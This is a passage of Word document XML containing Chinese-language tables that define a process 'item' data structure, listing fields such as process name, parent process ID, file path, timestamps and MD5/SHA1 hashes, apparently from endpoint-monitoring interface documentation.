          <w:p w14:paraId="52582571" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AA14CD9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="390DF0C8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>父进程，见</w:t>
            </w:r>
            <w:hyperlink w:anchor="item数据结构">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="af6"/>
                </w:rPr>
                <w:t>item数据结构</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6E852EA7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79E4C05A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57B42631" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="352A1C6A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B90D697" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>当前进程，见</w:t>
            </w:r>
            <w:hyperlink w:anchor="item数据结构">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="af6"/>
                </w:rPr>
                <w:t>item数据结构</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="065BA7AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="247" w:name="item数据结构"/>
      <w:r>
        <w:t>item数据结构</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2327"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="4387"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="14867CC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53C0D49" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BD66BE7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BF67A93" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59C92468" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3F44CAB8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="066EA835" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>process_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E37A3A9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="178E8342" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="514E2DED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="56E6907E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D21C4B8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>signature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23849273" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FF303D2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18E6520E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>签名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="24EBED0C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66420E75" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>parent_process_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F3192CC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BD94BFC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A45055F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>父进程ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="612F1836" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09F1AF8B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>create_time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17E8143B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D5CDFC5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F015538" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>创建时间，时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="44AE0938" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66C0CBC5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>b_wow64</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D5643F3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41796CA9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A4A6FC0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>32位进程在64位系统标志</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="52D15C9E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63A47578" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>process_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="373B6B6A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D948DC8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47102E69" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="26E26289" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44DAF782" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>b_64bit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F561576" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44822489" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FC07F59" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>64进程标志</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3FC2D88F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55EAD625" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>image_file_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D262202" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AF37507" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58DD6043" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程映像文件的全路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5EA87224" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30FAC735" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>parent_process_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FB90D41" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="193E37A7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02E9CEA0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>父进程名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4A669584" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F2FBAC0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>f_size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="651C4944" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="093396BD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B2A8CC1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件大小</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="32D7B16D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C82B4C7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>f_user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D5E2F9B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="415503B5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="757C0BA5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件所有者</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="760AB3E5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17BE7F70" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>f_type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="022BA131" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5ED37C70" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7259B1E6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>32/64/空 表示 32位文件，64位文件，空未知</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7A5BC598" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13A45566" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>f_ctime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="226CF19D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="487DD96B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F0ABF5B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件create time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7041B8F9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DB8599F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>f_mtime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1452F6EA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DD733CB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53EAC2D8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件modify time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="78AB9F04" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="246226DD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>f_atime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6479B03E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B6B3110" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A45F3ED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件access time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4687FBD4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B004713" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04B39007" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77A91436" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C795A3F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>全文md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="227A6253" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69D4BECB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21A8563A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5200B8CD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00BE6020" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>全文sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1075373C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
